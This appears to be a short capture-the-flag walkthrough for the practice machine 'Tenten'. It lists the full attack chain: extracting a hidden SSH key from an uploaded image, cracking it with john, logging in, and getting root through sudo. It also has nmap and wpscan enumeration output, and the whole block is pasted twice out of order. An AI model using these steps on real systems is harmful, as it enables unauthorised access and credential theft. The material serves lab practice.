Tenten 10.10.10.10 CV filename disclosure on Job-Manager WP plugin
Commands:
$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
$ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".
python sshng2john.py id_rsa > id_rsa.encrypted
john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
ssh -i id_rsa takis@10.10.10.10
takis@tenten:~$ sudo -l
sudo /bin/fuckin su
root@kali:~/Desktop/HTB_VIP# nmap -script=vuln 10.10.10.10
Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-25 22:52 PKT
Nmap scan report for 10.10.10.10
Host is up (0.13s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.10
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.10:80/
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-bars
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-close
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/index.php/category/uncategorized/
| Form id: search-form-5b8197994e6e2
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-search
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/wp-login.php
| Form id: loginform
| Form action: http://10.10.10.10/wp-login.php
|
| Path: http://10.10.10.10/index.php/jobs/
| Form id:
| Form action: http://10.10.10.10/index.php/jobs/apply/
|
| Path: http://10.10.10.10/#content
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/index.php/2017/04/
| Form id: search-form-5b81979f27fb2
|_ Form action: http://10.10.10.10/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wp-login.php: Possible admin folder
| /wp-login.php: Wordpress login page.
|_ /readme.html: WordPress version 4.7
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: takis
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
Nmap done: 1 IP address (1 host up) scanned in 360.64 seconds
root@kali:~/Desktop/HTB_VIP#
$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
$ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".
python sshng2john.py id_rsa > id_rsa.encrypted
john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
ssh -i id_rsa takis@10.10.10.10
takis@tenten:~$ sudo -l
sudo /bin/fuckin su
root@kali:~/Desktop/HTB_VIP# nmap -script=vuln 10.10.10.10
Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-25 22:52 PKT
Nmap scan report for 10.10.10.10
Host is up (0.13s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.10
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.10:80/
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-bars
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-close
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/index.php/category/uncategorized/
| Form id: search-form-5b8197994e6e2
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-search
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/wp-login.php
| Form id: loginform
| Form action: http://10.10.10.10/wp-login.php
|
| Path: http://10.10.10.10/index.php/jobs/
| Form id:
| Form action: http://10.10.10.10/index.php/jobs/apply/
|
| Path: http://10.10.10.10/#content
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/index.php/2017/04/
| Form id: search-form-5b81979f27fb2
|_ Form action: http://10.10.10.10/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wp-login.php: Possible admin folder
| /wp-login.php: Wordpress login page.
|_ /readme.html: WordPress version 4.7
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: takis
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
Nmap done: 1 IP address (1 host up) scanned in 360.64 seconds
root@kali:~/Desktop/HTB_VIP#
wpscan -u 10.10.10.10 -f -e -r
No comments